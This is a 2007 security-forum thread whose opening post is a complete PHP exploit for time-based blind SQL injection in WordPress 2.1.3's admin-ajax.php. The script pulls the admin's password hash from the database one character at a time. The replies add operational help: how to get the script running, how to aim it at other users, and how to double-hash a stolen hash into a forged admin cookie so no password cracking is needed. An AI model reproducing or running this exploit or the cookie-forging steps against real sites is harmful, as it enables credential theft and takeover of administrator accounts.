Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 223 Members: 0 Total: 223 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit Goto page 1, 2Next View previous topic :: View next topic WordPress 2.1.3 sql injection blind fishing exploit Posted: Mon May 21, 2007 12:05 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu For using this exploit you need: 1. working php installation 2. run this script as php CLI 3. modify needed parameters in script beginning Code: <?php error_reporting(E_ALL); $norm_delay = 0; /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// // WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit // written by Janek Vind "waraxe" // http://www.waraxe.us/ // 21. may 2007 /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// //===================================================================== $outfile = './warlog.txt';// Log file $url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php'; $testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000 $id = 1;// ID of the target user, default value "1" is admin's ID $suffix = '';// Override value, if needed $prefix = 'wp_';// WordPress table prefix, default is "wp_" //====================================================================== echo "Target: $url\n"; echo "sql table prefix: $prefix\n"; if(empty($suffix)) { $suffix = md5(substr($url, 0, strlen($url) - 24)); } echo "cookie suffix: $suffix\n"; echo "testing probe delays \n"; $norm_delay = get_normdelay($testcnt); echo "normal delay: $norm_delay deciseconds\n"; $hash = get_hash(); add_line("Target: $url"); add_line("User ID: $id"); add_line("Hash: $hash"); echo "\nWork finished\n"; echo "Questions and feedback - http://www.waraxe.us/ \n"; die("See ya! :) \n"); /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// function get_hash() { $len = 32; $field = 'user_pass'; $out = ''; echo "finding hash now ...\n"; for($i = 1; $i < $len + 1; $i ++) { $ch = get_hashchar($field,$i); echo "got $field pos $i --> $ch\n"; $out .= "$ch"; echo "current value for $field: $out \n"; } echo "\nFinal result: $field=$out\n\n"; return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($field,$pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*"; // First let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post); if($letter) { $min = 97; $max = 102; echo "char to find is [a-f]\n"; } else { $min = 48; $max = 57; echo "char to find is [0-9]\n"; } $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $inj = sprintf($ipattern, $prefix, $id, "=$max"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $inj = sprintf($ipattern, $prefix, $id, ">$curr"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } echo "curr: $curr--$max--$min\n"; } return $char; } /////////////////////////////////////////////////////////////////////// function test_condition($p) { global $url, $norm_delay; $bret = false; $maxtry = 10; $try = 1; while(1) { $start = getmicrotime(); $buff = make_post($url, $p); $end = getmicrotime(); if($buff === '-1') { break; } else { echo "test_condition() - try $try - invalid return value ...\n"; $try ++; if($try > $maxtry) { die("too many tries - exiting ...\n"); } else { echo "trying again - try $try ...\n"; } } } $diff = $end - $start; $delay = intval($diff * 10); if($delay > ($norm_delay * 2)) { $bret = true; } return $bret; } /////////////////////////////////////////////////////////////////////// function get_normdelay($testcnt) { $fa = test_md5delay(1); echo "$fa\n"; $sa = test_md5delay($testcnt); echo "$sa\n"; $fb = test_md5delay(1); echo "$fb\n"; $sb = test_md5delay($testcnt); echo "$sb\n"; $fc = test_md5delay(1); echo "$fc\n"; $sc = test_md5delay($testcnt); echo "$sc\n"; $mean_nondelayed = intval(($fa + $fb + $fc) / 3); echo "mean nondelayed - $mean_nondelayed dsecs\n"; $mean_delayed = intval(($sa + $sb + $sc) / 3); echo "mean delayed - $mean_delayed dsecs\n"; return $mean_delayed; } /////////////////////////////////////////////////////////////////////// function test_md5delay($cnt) { global $url, $id, $prefix, $suffix; // delay in deciseconds $delay = -1; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*'; $inj = sprintf($ipattern, $prefix, $id, $cnt); $post = sprintf($ppattern, $suffix, $inj, $suffix); $start = getmicrotime(); $buff = make_post($url, $post); $end = getmicrotime(); if(intval($buff) !== -1) { die("test_md5delay($cnt) - invalid return value, exiting ..."); } $diff = $end - $start; $delay = intval($diff * 10); return $delay; } /////////////////////////////////////////////////////////////////////// function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } /////////////////////////////////////////////////////////////////////// function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'); if(!empty($cookie)) { curl_setopt ($ch, CURLOPT_COOKIE, $cookie); } if(!empty($referer)) { curl_setopt ($ch, CURLOPT_REFERER, $referer); } if($headers === TRUE) { curl_setopt ($ch, CURLOPT_HEADER, TRUE); } else { curl_setopt ($ch, CURLOPT_HEADER, FALSE); } $fc = curl_exec($ch); curl_close($ch); return $fc; } /////////////////////////////////////////////////////////////////////// function add_line($buf) { global $outfile; $buf .= "\n"; $fh = fopen($outfile, 'ab'); fwrite($fh, $buf); fclose($fh); } /////////////////////////////////////////////////////////////////////// ?> Enjoy Last edited by waraxe on Tue May 22, 2007 2:35 am; edited 1 time in total Posted: Mon May 21, 2007 12:24 pm Sm0ke Moderator Joined: Nov 25, 2006 Posts: 141 Location: Finland exelent work again :) Posted: Mon May 21, 2007 11:48 pm oxygenne Advanced user Joined: Apr 13, 2005 Posts: 52 Are the hashes salted?? Re: :) Posted: Tue May 22, 2007 12:23 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu oxygenne wrote: Are the hashes salted?? Nop, they are good old plain md5 hashes Posted: Tue May 22, 2007 12:32 am bean703 Regular user Joined: Mar 21, 2007 Posts: 22 It's not working I keep getting this: Quote: PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on line 240 Posted: Tue May 22, 2007 1:57 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu bean703 wrote: It's not working I keep getting this: Quote: PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on line 240 CURL extension must be loaded. Look at php.ini: Code: extension=php_curl.dll And extensions directory must be defined correctly. Example: Code: ; Directory in which the loadable extensions (modules) reside. extension_dir = "./ext/" What about username they are not all "admin" :) ? Posted: Tue May 22, 2007 3:38 am _-GORO-_ Beginner Joined: May 22, 2007 Posts: 3 Nice work! What about username they are not all "admin" ? UNION ALL SELECT 1,2,user_name.... ????? Re: What about username they are not all "admin" : Posted: Tue May 22, 2007 9:40 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu _-GORO-_ wrote: Nice work! What about username they are not all "admin" ? UNION ALL SELECT 1,2,user_name.... ????? One way is to find out ID, which belongs to needed target user. Another way is to modify attack query. Orig: Code: WHERE ID=%d AND IF New: Code: WHERE display_name=%2527waraxe25%27 AND IF Posted: Tue May 22, 2007 11:01 am spec Beginner Joined: May 22, 2007 Posts: 4 "your session has expired" "incorrect password" is killing me whenever i edit the cookie to gain access, anyway around this? excellent work Posted: Tue May 22, 2007 11:33 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu spec wrote: "your session has expired" "incorrect password" is killing me whenever i edit the cookie to gain access, anyway around this? excellent work Do you know, that in cookie must be double-hashed password? I mean: md5(md5($password)) Re: What about username they are not all "admin" : Posted: Tue May 22, 2007 11:36 am _-GORO-_ Beginner Joined: May 22, 2007 Posts: 3 waraxe wrote: _-GORO-_ wrote: Nice work! What about username they are not all "admin" ? UNION ALL SELECT 1,2,user_name.... ????? One way is to find out ID, which belongs to needed target user. Another way is to modify attack query. Orig: Code: WHERE ID=%d AND IF New: Code: WHERE display_name=%2527waraxe25%27 AND IF Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Re: What about username they are not all "admin" : Posted: Tue May 22, 2007 11:45 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu I got it This needs some modifications to exploit. If you are interested, then I can make improved exploit with this additional functionality _-GORO-_ wrote: waraxe wrote: _-GORO-_ wrote: Nice work! What about username they are not all "admin" ? UNION ALL SELECT 1,2,user_name.... ????? One way is to find out ID, which belongs to needed target user. Another way is to modify attack query. Orig: Code: WHERE ID=%d AND IF New: Code: WHERE display_name=%2527waraxe25%27 AND IF Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Posted: Tue May 22, 2007 11:50 am spec Beginner Joined: May 22, 2007 Posts: 4 waraxe , i read something about that but that not what my wordpress gave me in my cookie whenever i log in, it just has these two lines Code: www. myblog .com FALSE /path/ FALSE 1211319735 wordpressuser_f7f9ab0e578f2388f870c9b6a88f2999 admin www. myblog .com FALSE /path/ FALSE 1211319735 wordpresspass_f7f9ab0e578f2388f870c9b6a88f2999 665e0b331c6dc4c6d747035199349fee ignore the spaces between the www,, and path because wp resides in a path but how can double the md5 hashes? Posted: Tue May 22, 2007 12:02 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Is this the situation: you want to get admin access to some target and don't have admin's password. But you got admin password md5 hash from database? And you want manually edit cookies, so you can gain admin access without need for md5 hash cracking? If so, then just get that md5 hash, you allready have and hash it one more time. And resulting hash (or must I say "double-hash"?) put in cookie, you are editing. By the way: http://codex.wordpress.org/WordPress_Cookies Quote: When you log into WordPress from http://example.com/wp-login.php, WordPress stores the following two cookies: Your user name A double-hashed copy of your password spec wrote: waraxe , i read something about that but that not what my wordpress gave me in my cookie whenever i log in, it just has these two lines Code: www. myblog .com FALSE /path/ FALSE 1211319735 wordpressuser_f7f9ab0e578f2388f870c9b6a88f2999 admin www. myblog .com FALSE /path/ FALSE 1211319735 wordpresspass_f7f9ab0e578f2388f870c9b6a88f2999 665e0b331c6dc4c6d747035199349fee ignore the spaces between the www,, and path because wp resides in a path but how can double the md5 hashes? Posted: Tue May 22, 2007 12:06 pm spec Beginner Joined: May 22, 2007 Posts: 4 you're right waraxe, thanks WordPress 2.1.3 sql injection blind fishing exploit www.waraxe.us Forum Index -> All other software You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 2 Goto page 1, 2Next All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.133 Seconds